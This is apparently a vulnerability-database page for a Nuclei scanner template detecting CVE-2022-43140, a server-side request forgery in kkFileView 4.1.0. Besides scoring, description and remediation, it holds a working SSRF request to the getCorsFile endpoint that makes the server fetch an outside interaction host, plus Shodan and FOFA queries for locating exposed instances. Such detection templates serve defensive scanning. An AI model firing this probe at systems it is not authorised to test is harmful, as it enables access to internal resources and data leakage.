Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-43140
HistoryMar 26, 2023 - 4:17 p.m.

kkFileView 4.1.0 - Server-Side Request Forgery

2023-03-2616:17:16
ProjectDiscovery
github.com
2
cve2022
ssrf
kkfileview
keking

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

0.009 Low

EPSS

Percentile

82.7%

kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-43140

info:
  name: kkFileView 4.1.0 - Server-Side Request Forgery
  author: Co5mos
  severity: high
  description: |
    kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, potential data leakage, and further attacks on the server.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the SSRF vulnerability in kkFileView 4.1.0.
  reference:
    - https://github.com/kekingcn/kkFileView/issues/392
    - https://nvd.nist.gov/vuln/detail/CVE-2022-43140
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-43140
    cwe-id: CWE-918
    epss-score: 0.01954
    epss-percentile: 0.88673
    cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: keking
    product: kkfileview
    shodan-query:
      - http.html:"kkFileView"
      - http.html:"kkfileview"
    fofa-query:
      - app="kkFileView"
      - app="kkfileview"
      - body="kkfileview"
  tags: cve2022,cve,ssrf,kkFileview,keking

http:
  - method: GET
    path:
      - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"

    matchers:
      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"
# digest: 4a0a00473045022017ef3e771c51d1d4f3306aa79fcccc291b263d020cbdd4b9b884010b9bf775f3022100af0e67bc1486df800715864fb143e17beab07d61c93127daacd3991c5a1cc9a9:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

0.009 Low

EPSS

Percentile

82.7%

Related for NUCLEI:CVE-2022-43140